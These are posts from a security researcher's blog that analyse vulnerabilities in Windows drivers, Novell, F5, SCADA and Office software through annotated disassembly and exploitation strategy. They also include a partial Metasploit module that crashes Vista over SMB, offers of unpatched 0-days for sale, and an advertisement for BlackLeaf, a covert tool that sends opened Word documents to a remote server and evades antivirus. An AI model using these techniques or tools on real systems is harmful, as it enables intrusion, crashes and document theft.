.text:0044A9B3 lea ebp, [ebx+9]; jumptable 00449E35 case 25 .text:0044A9B6 or ecx, 0FFFFFFFFh .text:0044A9B9 mov edi, ebp .text:0044A9BB xor eax, eax IreIKE.exe parses our buffer looking for a valid connection name, if none it invokes a common error routine where the stack overflow occurs. .text:0044AA2C push ebp ; char .text:0044AA2D push offset aSUnrecognizedC ; "%s - unrecognized connection name." .text:0044AA32 mov dword_479FF8, 20h .text:0044AA3C call sub_437020 .text:0044AA41 add esp, 8 .text:0044AA44 .text:0044AA44 loc_44AA44: ; CODE XREF: sub_449DA0+C8A#j .text:0044AA44 push 0 ; int .text:0044AA46 push 0 ; int .text:0044AA48 push 0 ; int .text:0044AA4A push ebp ; char * .text:0044AA4B push 80h ; char .text:0044AA50 call sub_44AD00 ; Common error routine \|\| \ / \/ ; int __cdecl sub_44AD00(char,char ,int,int,int) sub_44AD00 proc near var_2F8= dword ptr -2F8h to= sockaddr ptr -2F4h buf= byte ptr -2E4h var_2E0= byte ptr -2E0h var_2D9= dword ptr -2D9h var_2D5= dword ptr -2D5h var_2D1= byte ptr -2D1h var_D4= dword ptr -0D4h ; Attention! arg_0= byte ptr 4 arg_4= dword ptr 8 arg_8= dword ptr 0Ch arg_C= dword ptr 10h arg_10= dword ptr 14h sub esp, 2F8h push ebx [...] .text:0044AD9F lea edx, [esp+314h+var_D4] .text:0044ADA6 push edi ; char .text:0044ADA7 push edx ; int .text:0044ADA8 mov [esp+31Ch+buf+3], 1 .text:0044ADAD mov [esp+31Ch+buf+2], bl .text:0044ADB1 mov [esp+31Ch+buf+1], bl .text:0044ADB5 mov [esp+31Ch+buf], bl .text:0044ADB9 mov [esp+31Ch+var_2E0], 2Fh .text:0044ADBE mov [esp+31Ch+var_2D9], esi .text:0044ADC2 call sub_40F890 .text:0040F890 ; int __cdecl sub_40F890(int,char ,int,int) .text:0040F890 sub_40F890 proc near ; CODE XREF: sub_408D30+17B#p .text:0040F890 ; sub_410850+108#p ... .text:0040F890 .text:0040F890 var_28 = byte ptr -28h .text:0040F890 arg_0 = dword ptr 4 .text:0040F890 arg_4 = dword ptr 8 .text:0040F890 arg_8 = dword ptr 0Ch .text:0040F890 arg_C = dword ptr 10h .text:0040F890 .text:0040F890 mov edx, [esp+arg_4] .text:0040F894 sub esp, 28h .text:0040F897 or ecx, 0FFFFFFFFh .text:0040F89A xor eax, eax .text:0040F89C push ebx .text:0040F89D push ebp .text:0040F89E push esi .text:0040F89F push edi .text:0040F8A0 mov edi, edx .text:0040F8A2 mov ebp, [esp+38h+arg_0] .text:0040F8A6 repne scasb .text:0040F8A8 not ecx .text:0040F8AA sub edi, ecx .text:0040F8AC push 5Ch ; int .text:0040F8AE mov eax, ecx .text:0040F8B0 mov esi, edi .text:0040F8B2 mov edi, ebp .text:0040F8B4 push edx ; char .text:0040F8B5 shr ecx, 2 .text:0040F8B8 rep movsd ; FLAW .text:0040F8BA mov ecx, eax .text:0040F8BC and ecx, 3 .text:0040F8BF rep movsb Once the program returns from sub_44AD00 the flaw will be triggered. That's all! See you in the next advisory :)

Exploiting Novell/Netidentity Agent Remote Arbitrary Pointer Dereference.
(Thursday, 09 April 2009) Written by Rubén
Hi there, After months of inactivity I'm back with a hot exploit for a recently released flaw I discovered some time ago. Extracted from the ZDI's advisory : Vulnerability Details This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Netware. A valid IPC$ connection must be established in order to exploit this vulnerability. The specific flaw exists within xtagent.exe during the handling of RPC messages over the XTIERRPCPIPE named pipe. Insufficient sanity checking allows remote attackers to dereference an arbitrary pointer which can be leveraged to execute code under the context of the system user. Technically xtagent.exe creates a named pipe which is used as an RPC endpoint ( its own RPC implementation though ) Module: xtagent.exe (4.91 SP4) .text:0040129C lea ecx, [ebp+SecurityAttributes] .text:0040129F push ecx ; lpSecurityAttributes .text:004012A0 push 4E20h ; nDefaultTimeOut .text:004012A5 push 800h ; nInBufferSize .text:004012AA push 800h ; nOutBufferSize .text:004012AF push 0FFh ; nMaxInstances .text:004012B4 push 4 ; dwPipeMode .text:004012B6 push 3 ; dwOpenMode .text:004012B8 push offset Name ; "\\\\.\\PIPE\\XTIERRPCPIPE" .text:004012BD call ds:CreateNamedPipe This pipe can be accessed only if a valid $IPC session can be established. No valid credentials are needed so you can also use a NULL session. The pipe waits for remote commands which are referenced by the first dword within the received buffer. Module: xtagent.exe .text:004013A2 push eax ; lpOverlapped .text:004013A3 lea edx, [ebp+NumberOfBytesRead] .text:004013A6 push edx ; lpNumberOfBytesRead .text:004013A7 push 800h ; nNumberOfBytesToRead .text:004013AC push ebx ; lpBuffer .text:004013AD push esi ; hFile .text:004013AE call ds:ReadFile .text:004013B4 test eax, eax .text:004013B6 jz loc_401542 .text:004013BC mov edi, 18h .text:004013C1 cmp [ebp+NumberOfBytesRead], edi .text:004013C4 jb loc_401557 .text:004013CA mov eax, [ebx] ebx= user-controlled buffer .text:004013CC dec eax .text:004013CD cmp eax, 4 ; 5 RPC functions .text:004013D0 ja loc_401508 ; default .text:004013D6 jmp ds:off_4015E0[eax*4] ; switch jump The buffer where ReadFile copies the received bytes is allocated, just one time per session, in the heap and then subsequently zeroed in each request. Module: xtagent.exe mov eax, dword_40D55C mov ecx, [eax] push 800h ; buffsize push eax call dword ptr [ecx+68h] ; allocate buffer mov ebx, eax [...] .text:00401397 mov ecx, 200h .text:0040139C xor eax, eax .text:0040139E mov edi, ebx .text:004013A0 rep stosd ; memset(buffer,0,buffsize) There are 5 functions we can reach through this named pipe. The flaw is that we can dereference an arbitrary pointer to a VTABLE thus controlling a call to an arbitrary address. Module: xtagent.exe .text:004015DD align 10h .text:004015E0 off_4015E0 dd offset loc_4013DD .text:004015E0 dd offset loc_401466 ; arbitrary pointer dereference #1 .text:004015E0 dd offset loc_4014C0 ; arbitrary pointer dereference #2 .text:004015E0 dd offset loc_401512 ; heap memory leak #1 .text:004015E0 dd offset loc_401512 ; heap memory leak #2 .text:004015F4 align 10h So Module: xtagent.exe .text:00401466 mov eax, [ebx+8] ; edx controlled (points to sent buffer) .text:00401469 mov [ebp+var_4], 0 .text:00401470 mov edx, [eax] ;eax controlled .text:00401472 push eax .text:00401473 call dword ptr [edx+8] ; edx controlled We can control all remarkable registers, however we cannot exploit this issue in a reliable manner without knowing where ReadFile has read our controlled buffer. Fortunately there are two functions which call to WriteFile with a user-controlled size so we can leak bytes from the heap that lies beyond our buffer, therefore we can calculate, based on the next chunk's metadata, where our buffer is located. Module: xtagent.exe .text:00401512 push 0 ; jumptable 004013D6 cases 3,4 .text:00401514 lea edx, [ebp+NumberOfBytesWritten] .text:00401517 push edx ; lpNumberOfBytesWritten .text:00401518 mov eax, [ebx+4] ; controlled .text:0040151B push eax ; nNumberOfBytesToWrite .text:0040151C push ebx ; lpBuffer .text:0040151D push esi ; hFile .text:0040151E call ds:WriteFile graphically That's all. You can grab more details by reading the exploit code. Novell/NetIdentity Agente Remote Arbitrary Pointer Dereference Download exploit code. happy hunting!

BlackLeaf released
(Friday, 30 January 2009) Written by Rubén
BlackLeaf is a software intended for pentesting and/or monitoring, not for any illegal purpose. BlackLeaf comprises of several components. The user-mode dll component is the only one that has to be present on the target's machine. To achieve this goal, the dll should be installed by any mean, including: Manual modification of the registry and hard disk ( requires physical access) Remote installation by using a specially developed program that silently drops and runs all the required components ( this program is included ) We can see in the picture above that, once the BlackLeaf client ( a single dll ) has been installed on the target's machine , it sends -in real-time - every document opened in Microsoft Word to a remote server. BlackLeaf supports HTTPS for sending the documents,it's highly recomendable to use this option. A valid Certificate is not needed at all. BlackLeaf demo from Ruben on Vimeo . Download high-resolution demo video ( 62 mb ) Download whitepaper Features: Point-and-click configuration. Works on Microsoft Word XP, 2003 and 2007. Works on 2000, XP , 2003 , 2008 , Vista and Windows 7 You just need a web hosting where the files will be uploaded. Bypasses Word's password protection.You receive the document unprotected. Bypasses Kaspersky IS 2009, Symantec Norton 360 2.0 and McAfee IS 2009 among others... Files are identified by a customizable identification number to distinguish their source. Obtains the exact location from where the document was opened. Requires admin privileges. More information: http://blackleaf.reversemode.com

Exploiting kaspersky klim5.sys driver + Happy pack #2
(Wednesday, 21 January 2009) Written by Rubén
Interested in happy pack #2? this time is focused on the Microsoft Office suite. Fingerprinting remote machines Dynamic content generation in documents for using in targeted attacks 0day Do not hesitate to contact me if you are interested. For legal companies and institutions ONLY. Please, no vuln-info see-u-ckers. No gangs. Let's talk about an interesting flaw I found months ago in Kaspersky's NDIS engine. This driver is in charge of intercepting when a packet arrives or is sent. (Un)fortunately a simple user-mode program can modify some callbacks in klim5.sys to point to a user-mode controlled address, just by sending a specially crafted IOCTL request.So... we face a local privilege escalation.Again. .text:00011774 cmp ecx , 80052110h ; IOCTL .text:0001177A jnz short loc_117E9 .text:0001177C cmp ebp , 10h .text:0001177F jnb short loc_1178E ; FLAW .text:00011781 push 10h .text:00011783 mov [esp+ 14h + Irp ] , 0C0000023h .text:0001178B pop ebx .text:0001178C jmp short loc_117E9 .text:0001178E ; --------------------------------------------------------------------------- .text:0001178E .text:0001178E loc_1178E: ; CODE XREF: sub_11730+4Fj .text:0001178E push offset SpinLock ; SpinLock .text:00011793 push offset dword_140A8 ; int .text:00011798 push edi ; int .text:00011799 call sub_11604 ; Flaw .text:0001179E add edi , 8 .text:000117A1 push offset dword_140B8 ; SpinLock .text:000117A6 or eax , 0FFFFFFFFh .text:000117A9 sub eax , [edi] .text:000117AB push offset dword_140B0 ; int .text:000117B0 push edi ; int .text:000117B1 mov [edi] , eax .text:000117B3 call sub_11604 and finally .text:000115CB push [ebp+ arg_0 ] .text:000115CE call dword ptr [edi+ 8 ] ; Controlled What it is interesting in this flaw is the way of exploiting it. NDIS calls are "context-free" by definition, so when a packet arrives or is sent, the NDIS call can be invoked in an arbitrary thread context. Therefore, the callback we are modifying could be invoked in any other thread than ours. There is an intrinsic race condition in the exploit. Let's imagine a scenario where the exploit modifies the callback to point to the address of its shellcode at 0x401000. However,before the callback reachs our code in the exploit's context, another thread triggers the callback and therefore, that address can contain anything, note that also the memory referenced must be paged in since the callback is dispatched at DISPATCH_LEVEL. To solve this scenario we must follow the steps below: Boost the priority of our exploit process/thread Search common bytes in ring3 which are being shared by all the processes,the modify them(in the exploit's context) to point to our shellcode whilst in other processes that same address should point to a "ret 4" instruction. (NtDeleteKey+n). The shellcode must modify the callbacks to point to a "ret 4" address that can be accessed in Ring0(ExGetSharedWaitersCount+n). In this way the system keeps stable. Let's see While running the exploit After running the exploit I notified kaspersky about this flaw several months ago. This flaw is fixed in the latest KIS 2009 and according to them it was fixed in KAV for WorkStation yesterday, I cannot confirm it. You can download the k-plugin for Kartoffel here

MS08-070 makes happy pack #1 cry.
(Tuesday, 16 December 2008) Written by Rubén
The happy pack #1 is no longer happy, after Microsoft Bulletin MS08-70 it turns out to be the "the sad pack #1". This bulletin addresses several vulnerabilities within vb6 controls. A flag comparison added to the Animation Control breaks definetely the weakness the happy pack was taking advantage of. Let's see. Background ● Component Automation Error Handling API Functions ● Using the Animation Control http://msdn.microsoft.com/en-us/library/aa231219(VS.60).aspx ● Trappable errors for the Windows Common Controls http://msdn.microsoft.com/en-us/library/aa276365(VS.60).aspx ● JavaScript Try...Catch Statetement http://www.w3schools.com/js/js_try_catch.asp “An animation control is a window that displays an Audio-Video Interleaved (AVI) clip. An AVI clip is a series of bitmap frames like a movie.” MSDN MsComct2.ocx implements the Microsoft Animation Control which is identified by the following CLSID : {B09DE715-87C1-11D1-8BE3-0000F8754DA1} This ActiveX control can be installed through multiple channels, Redistributable packages, VB6 Runtime Extended Files. The Microsoft Animation Control is considered as “safe for scripting” and “safe for initialization” as we can check via the following registry keys. Safe-for-scripting key HKEY_CLASSES_ROOT\CLSID\{B09DE715-87C1-11D1-8BE3-0000F8754DA1}\ImplementedCategories\{7DD95801-9882-11CF-9FA9-00AA006C42C4} Safe-for-initialization key HKEY_CLASSES_ROOT\CLSID\{B09DE715-87C1-11D1-8BE3-0000F8754DA1}\ImplementedCategories\{7DD95802-9882-11CF-9FA9-00AA006C42C4} By using Microsoft's OleView.exe, we can gather more information about the control.One of the things we note is that the control defines a serie of error codes typedef [uuid(79311D2C-87C0-11D1-8BE3-0000F8754DA1), helpstring("Error Constants"), helpcontext(0x00035bbc)] enum { [...] cc2InconsistentObject = 35750, cc2ErrorDuringSet = 35751, cc2ErrorOpeningVideo = 35752, > > 1)+e.number%2).toString(16) + ' # ' + e.number ); } try{ target.Open( file2 ); }catch(e){ alert(file2 + ' => ' +e.description + ': 0x'+(2*(e.number> > > 1)+e.number%2).toString(16) + ' # ' + e.number ); } We take advantage of a common exception handling procedures either in JavaScript or Vbscript in order to capture the error set by the ActiveX control. This technique allowed us to clearly disguise whether an arbitrary file exists or not. Since we were controlling a CreateFile call, we could map internal network addresses by opening remote pipes ("\\192.168.x.x\pipe\lsarpc"), or discover processes through their named pipes ("\\.\pipe\Antivirus_X_pipe") ... That's all. Stay tuned for the happy pack #2 that will be put on sale in upcoming weeks (including 0days for Office among other things...)

1,2,3,4,5 Exploits...for free.
(Thursday, 16 October 2008) Written by Rubén
Yeah, I still write exploits for fun and for free :P 1. Microsoft AFD.sys local privilege escalation ( MS08-066 ) Download exploit code (k-plugin for kartoffel ). 2. GEAR Software Powered Products (Symantec 360, Apple iTunes...) - Microsoft Windows Kernel IopfCompleteRequest Integer Overflow. Local privilege escalation exploit. Download exploit code (k-plugin for kartoffel ). 3. Novell Client 4.91 Netware Redirector nwfs.sys Local privilege escalation exploit. Download exploit code (k-plugin for kartoffel ). 4. F5's FirePass VPN Client F5FPAPI.dll ActiveX Remote Heap Overflow Exploit. 0-day Download exploit code. [ uuid(82BFA4B6-F84C-43F2-8F10-2D036D7498BC), helpstring("F5 Networks AppTunnel ver. 2.1 DispInterface"), dual ] dispinterface IAppTunnelExWithWebLogin { properties: methods: [id(0x00000001), helpstring("method OpenSession")] VULNERABLE METHOD void OpenSession( BSTR szHost, long sPort, BSTR szUsername, BSTR szPassword); This method can be invoked through the registered ActiveX by using either javascript or vbscript. This ActiveX provides the proper API to third-party developers as well. The flaw occurs when the activex logs a unsucessful session by using the following string: Module: “f5fpapi.dll” .data:1004D468 ; char aConnectionToWs[] .data:1004D468 aConnectionToWs db 'Connection to %ws failed (0x%hu)',0 .data:1004D468 ; DATA XREF: sub_1000D702+2C6#o .data:1004D468 ; sub_1000E0EE+1F2#o ... Then, szHost is passed as argument to _vsprintf, that uses a fixed buffer of 60 bytes allocated on the heap. By providing a long szHost argument, we can overflow that buffer. Module: “f5fpapi.dll” .text:100298C5 push [ebp+Args] ; Args .text:100298C8 push [ebp+Format] ; Format .text:100298CB push dword ptr [esi] ; Dest – Fixed Buffer .text:100298CD call _vsprintf ; FLAW 5. Motorola/Netopia NetOctopus DCS Remote Stack Overflow Pre-Auth. 0-day ( not really, 48bits' exploit4food rules!! ;) ) Download exploit code.

Happy pack #1. I know what you installed last summer.
(Wednesday, 01 October 2008) Written by Rubén
It's really frustrating not to know what applications, patches, hotfixes (virtually any file)...are installed on the system where you are performing a penetration test, isn't it? I have decided to put for sell, to trusted sources only , a novel technique that takes advantage of a weakness in Microsoft technology that allows remote attackers to gain knowledge of sensitive information like applications, hotfixes,service packs installed on PCs running Windows 2000 or later . The only scenario you need is to trick the victim into visiting a webpage under your control. Note that... No third-party software is involved. Totally unknown technique. No patch available. Vendor has not been notified Either minimal or no user interaction required. FAQ Who can buy the happy pack #1? If you cannot demonstrate you are working for a company or institution, better you don't waste your time trying it. How much does it cost? $800 dollars - €600 euros. What does the happy pack #1 include ? Fully comprehensive technical report and exploit code. Obviously, you can request further info if, once purchased, you have doubts on any matter... Mmm, it seems interesting...Whom should I talk to? contact [at] reversemode (dot) com contact [at] wintercore (dot) com happy hunting!

Exploit for DATAC RealWin 2.0 SCADA Software
(Friday, 26 September 2008) Written by Rubén
Hi, I have just uploaded an exploit for DATAC RealWin 2.0 , a SCADA software used in small/medium installations. The version available for download is likely an old one so newer versions may, or may not, be vulnerable. Note that the server is affected by other flaws, but this one is pretty clear and 100% reliable. The bug is a classic stack overflow while processing a specially crafted FC_INFOTAG/SET_CONTROL packet. RealWin server accepts connections from FlewWin clients which use a propietary protocol. We can exploit this flaw from remote without having valid credentials . .text:0042BFFE call sub_419690 ; Get Packet.PayloadLen .text:0042C003 movzx ecx , ax .text:0042C006 mov edx , ecx .text:0042C008 shr ecx , 2 .text:0042C00B mov esi , ebx .text:0042C00D lea edi , [esp+ 638h + var_2E0 ] .text:0042C014 rep movsd .text:0042C016 mov ecx , edx .text:0042C018 and ecx , 3 .text:0042C01B rep movsb That's all, just for fun. Download exploit code.

Microsoft Windows WRITE_ANDX SMB Command Handling Kernel DoS
(Monday, 15 September 2008) Written by Rubén
Hi, Some days ago Javier Vicente Vallejo came up with a kernel level DoS, that was crashing a Windows Vista SP1 machine, requesting a second opinion. As a result of the research, the following advisory... Microsoft Windows WRITE_ANDX SMB command handling Kernel DoS Vulnerability and Exploit: Javier Vicente Vallejo, http://www.vallejo.cc Vulnerability Analysis: Ruben Santamarta, http://www.reversemode.com Abstract Microsoft Windows is prone to a remote Kernel Denial of Service due to the way srv.sys handles malformed WRITE_ANDX SMB packets. Remote attackers could exploit this issue without having valid credentials on the target machine. In order to achieve a successful exploitation, the attacker needs enough privileges to remotely send WRITE_ANDX packets to an interface that uses a Named Pipe as endpoint. Those interfaces that allow NULL Sessions vary between Windows versions, in Vista the reliability of a preauth attack through the “\LSARPC” has been successfully demonstrated. Affected versions Theorically verified on: Windows 2000, XP, Server 2003, Vista, Server 2008. Successfully exploited on: Microsoft Windows Vista SP1 with latest security updates. Analysis A condition exists with srv.sys and npfs.sys wherein a specially crafted WRITE_ANDX SMB packet may cause a kernel Denial Of Service. 1: kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: 92bc0000, memory referenced. Arg2: 00000000, value 0 = read operation, 1 = write operation. Arg3: 81c834b3, If non-zero, the instruction address which referenced the bad memory address. Arg4: 00000000, (reserved) Debugging Details: ------------------ READ_ADDRESS: 92bc0000 Nonpaged pool FAULTING_IP: nt!memcpy+33 81c834b3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] MM_INTERNAL_CODE: 0 DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT BUGCHECK_STR: 0x50 PROCESS_NAME: System CURRENT_IRQL: 0 TRAP_FRAME: 90126b40 -- (.trap 0xffffffff90126b40) ErrCode = 00000000 eax=92bc02cf ebx=90126c4c ecx=000000b4 edx=00000000 esi=92bbffff edi=98640b98 eip=81c834b3 esp=90126bb4 ebp=90126bbc iopl=0 nv up ei pl nz ac po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010212 nt!memcpy+0x33: 81c834b3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] es:0023:98640b98=00000000 ds:0023:92bbffff=???????? Resetting default scope LAST_CONTROL_TRANSFER: from 81cd86df to 81c81720 STACK_TEXT: 901266b4 81cd86df 00000003 9012dc44 00000000 nt!RtlpBreakWithStatusInstruction 90126704 81cd914c 00000003 00000000 8c3236b0 nt!KiBugCheckDebugBreak+0x1c 90126ab0 81ca9df2 00000050 92bc0000 00000000 nt!KeBugCheck2+0x5f4 90126b28 81c8fa34 00000000 92bc0000 00000000 nt!MmAccessFault+0x106 90126b28 81c834b3 00000000 92bc0000 00000000 nt!KiTrap0E+0xdc 90126bbc 8726422c 98640a68 92bbfecf 00000400 nt!memcpy+0x33 < kv ChildEBP RetAddr Args to Child […] 90126bbc 8726422c 98640a68 92bbfecf 00000400 nt!memcpy+0x33 […] 1: kd> !pool 92bbfecf-($Packet.DataLength) Pool page 92bafed0 region is Nonpaged pool *92baf000 : large page allocation, Tag is LSwn, size is 0x2050 bytes Pooltag LSwn : normal work context We demonstrate that the flaw is indeed reproducible. 1: kd> !pte 92bbfecf - ($Packet.DataLength) VA 92bafed0 PDE at 00000000C06024A8 PTE at 00000000C0495D78 contains 00000000030B8863 contains 0000000009A40963 pfn 30b8 ---DA--KWEV pfn 9a40 -G-DA--KWEV 1: kd> !pte 92bbfecf + ($Packet.DataLength) VA 92bcfece PDE at 00000000C06024A8 PTE at 00000000C0495E78 contains 00000000030B8863 contains 0000325E00000000 pfn 30b8 ---DA--KWEV not valid < db 92bbfecf - ($Packet.DataLength) 92bafed0 ff 53 4d 42 2f 00 00 00-00 18 07 c8 00 00 cc cc .SMB/........... 92bafee0 cc cc cc cc cc cc 00 00-00 08 dc 24 01 08 37 72 ...........$..7r 1: kd> db 92bbfecf + ($Packet.DataLength) 92bcfece ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 92bcfede ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? Although the bug was not reproduced in this way (because it is related to how srv.sys handles its IRPs), if you are interested, you could debug some parts of this code: you can locally reproduce the way to reach to npfs!NpInternalWrite and npfs!NpWriteDataQueue by using Kartoffel : kartoffel -d \\.\pipe\lsass -n 0x20 -o 0 -z 0x101 -Z 0x0 -I 0x119ff8 –g -u ADDRESS,INVALID_ADDRESS Exploit Here is a PoC exploit module for metasploit that you could use to reproduce the crash: require 'msf/core' module Msf module Exploits module Test class BugTest < Msf::Exploit::Remote include Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'test exploit', 'Description' => "tests", 'Author' => 'tests', 'License' => MSF_LICENSE, 'Version' => '$Revision: 0 $', 'Arch' => 'x86', 'Payload' => { 'Space' => 1000 }, 'Targets' => [ [ 'Windows VISTA', { 'Platform' => 'win' } ], ], 'DefaultTarget' => 0)) end def subexploit(dlenlow, doffset,fillersize) print_line("1") datastore['SMBUser']='testuser' datastore['SMBPass']='testuser' datastore['SMBDomain']='COBAYA' datastore['SMBName']='COBAYA' print_line("2") connect() print_line("3") smb_login() print_line("4") pkt = CONST::SMB_CREATE_PKT.make_struct pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt['Payload']['SMB'].v['WordCount'] = 24 pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['AndXOffset'] = 0xdede pkt['Payload'].v['FileNameLen'] = 14 pkt['Payload'].v['CreateFlags'] = 0x16 pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed pkt['Payload'].v['ShareAccess'] = 7 pkt['Payload'].v['CreateOptions'] = 0x400040 pkt['Payload'].v['Impersonation'] = 2 pkt['Payload'].v['Disposition'] = 1 pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" simple.client.smb_send(pkt.to_s) print_line("5") ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX) pkt = CONST::SMB_WRITE_PKT.make_struct data_offset = pkt.to_s.length - 4 print_line("6") filler = Rex::Text.rand_text(fillersize) print_line("7") pkt['Payload']['SMB'].v['Signature1']=0xcccccccc pkt['Payload']['SMB'].v['Signature2']=0xcccccccc pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt['Payload']['SMB'].v['WordCount'] = 14 pkt['Payload'].v['AndX'] = 255 pkt['Payload'].v['AndXOffset'] = 0xdede pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID'] pkt['Payload'].v['Offset'] = 0 pkt['Payload'].v['Reserved2'] = -1 pkt['Payload'].v['WriteMode'] = 8 pkt['Payload'].v['Remaining'] = fillersize pkt['Payload'].v['DataLenHigh'] = 0 pkt['Payload'].v['DataLenLow'] = dlenlow #

Summertime
(Tuesday, 12 August 2008) Written by Rubén
Wow, I wrote the last entry in June, that's not good. I promess that in the upcoming months I'll try to do better... First off, we are going to talk about bugs. Today Microsoft has released the security bulletin for August where addresses, among others, a couple of flaws in PowerPoint I discovered about a year ago. Nothing really exciting, one of them is a classical integer overflow, let's see: .text:300F6467 loc_300F6467: ; CODE XREF: sub_300F6402+5B#j .text:300F6467 push esi ; malicious length .text:300F6468 call sub_30133564 ----> [..] ----> .text:30133564 mov eax, [esp+arg_0] .text:30133568 add eax, 3 ; Integer Overflow ( 0xFFFFFFFF + 3 ) .text:3013356B and al, 0FCh ; align .text:3013356D push eax ; 0 .text:3013356E push 0 ; uFlags .text:30133570 call ds:GlobalAlloc ; Underallocate .text:30133576 test eax, eax .text:30133578 jnz short locret_3013357F et voilà...heap overflow. The second one is more interesting, while parsing picture records we can force an arbitrary function pointer dereference by modifying certain index. .text:300F8B16 mov ecx, [eax+2] ; malicious index .text:300F8B19 mov ecx, [edx+ecx*4-4] .text:300F8B1D lea edx, [esi+15Ch] .text:300F8B23 mov [edx], ecx .text:300F8B25 mov [eax+2], ecx .text:300F8B28 cmp dword ptr [edx], 0 .text:300F8B2B jz short loc_300F8B33 .text:300F8B2D mov eax, [ecx] ; loads arbitrary pointer .text:300F8B2F push ecx .text:300F8B30 call dword ptr [eax+4] ; Boom! The interesting part is how we can exploit this issue. If we were exploiting this flaw within a browser context, it would be a children's play. Just by spraying the heap we can achieve the code execution, in PowerPoint it's not so different but slighltly changes. We don't know neither where our shellcode is nor the address of our fake pointer so we need to spray the heap as well. The only thing that varies is the way to do it. In this case we have to embed several pictures in the ppt in order to control how the heap will look like. After that, we change the content of the pictures (raw bytes, avoiding to modify headers just in case) by our nop-slide and in the last image we will copy the shellcode. It seems that I missed an advisory from Novell for a METHOD_NEITHER flaw in NWFS.sys I reported some time ago. It was released on June according to secunia . I'm planning to upload a k-plugin for this flaw soon. If you like ring0 flaws stay tuned since I'll release, in a couple of weeks, an interesting flaw which affects several vendors. On the other hand, I'm moving to the greener pastures of pure remote bugs, previously I've never digged too much into networking issues but it seems cool. I have found several flaws so far so I think that I came to stay. Nevertheless, don't forget that there are still a lot of buggy drivers out there :) ! That's all. See you in september!

Kartoffel 1.4 is out
(Wednesday, 18 June 2008) Written by Rubén
The new version of kartoffel is already available for download in 32/64-bit flavours for Vista/2003/XP/2k. As expected I have received no feedback with regards to the new version, neither bugs nor suggestions... nothing at all, so I assume that either I am the only person in the world that uses kartoffel or I am very good at programming which is less likely. Anyway this new version includes the following features: Integration with WinDbg through kar_ext.dll (Kartoffel Extension) This extension does not work on 2K, anyway you should be able to grab raw data through "!bugdump" command. On Windows Versions higher than 2K you can use this extension to get the data that Kartoffel embeds within the crash dump (see image above ) you may get while debugging/researching into a driver. In order to let kartoffel track your steps, you must add up the option "-X" to the command-line in every execution. See "kartoffe-userguide.pdf" for further information. Retarded heuristic for spotting uninitialized kernel memory leaks in METHOD_BUFFERED requests. This is a common problem since the I/O Manager just initializes the input buffer (in METHOD_BUFFERED both input and output buffers are overlapped) so if the driver returns the whole length of the output buffer we can leak bits from the kernel. See the following image, the example is taken from a Microsoft Driver "msgpc.sys". In this case it's not a big deal since you need admin privileges. Force memory dump. Crash your machine for fun and profit via "-Y" option. Build up your custom buffer through the command-line I've added a new fuzzing method where you can describe the contents of the buffer just by using the command-line, you don't need a k-plugin. The CUSTOM Method allows you to write Pointers, Bytes, Ansi strings and Wide Strings. You can also specify “repeat” and “offset” parameters where repeat sets the number of times the specified value will be repeated and “offset” is the position (in bytes) within the buffer at which the value will begin to be written. Tokens: • Write a Pointer [P=0xVALUE::REPEAT$OFFSET] • Write a Byte [B=0xVALUE::REPEAT$OFFSET] • Write an Ansi String [A=this is an ansi string::REPEAT$OFFSET] • Write a Wide String [W=This is a wide string::REPEAT$OFFSET] • Finalize BufferString [!!] Example: -u CUSTOM,”[P=0xDEADBEEF::8$4][A=Escape \”Quotes\”::1$8][B=0x41::*0][!!]” This string will write 0xDEADBEEF 8 times beginning at offset 0x4, then the string will be copied 1 time at 0x8 and finally the byte 0x41 will be written one time at offset 0. That's all, well there are minor bugs fixed but nothing really remarkable. Have fun, happy hunting/debugging!

Doo bee doo, doo doo bee dooo...
(Tuesday, 13 May 2008) Written by Rubén
One month later... I have just uploaded a new k-plugin for Kartoffel. It's an exploit for a local vulnerability in i2omgmt.sys, a Microsoft driver, which has been fixed in the Service Pack 3. The exploit for a recent Realtek HD Audio Code Drivers flaw is also available as a k-plugin. I'm planning to release a new version of Kartoffel soon. This new version will include among other things, integration with WinDbg to make debugging crashdumps caused by kartoffel easier. So it's time to drop me a line if you have missed functionalities, spotted a bug... See you in a month or so!

Exploit for win32k!ntUserFnOUTSTRING (MS08-25/n)
(Friday, 11 April 2008) Written by Rubén
Hi there, I'm still alive. This month Microsoft has patched a bunch of bugs within gdi32.dll and win32k.sys mainly. Thomas Garnier is doing a really good job researching into core components, just take a look at the latest bulletins. There is a shared error between several vulnerabilities patched in this bulletin, which is explained in detail at the

Kartoffel matters
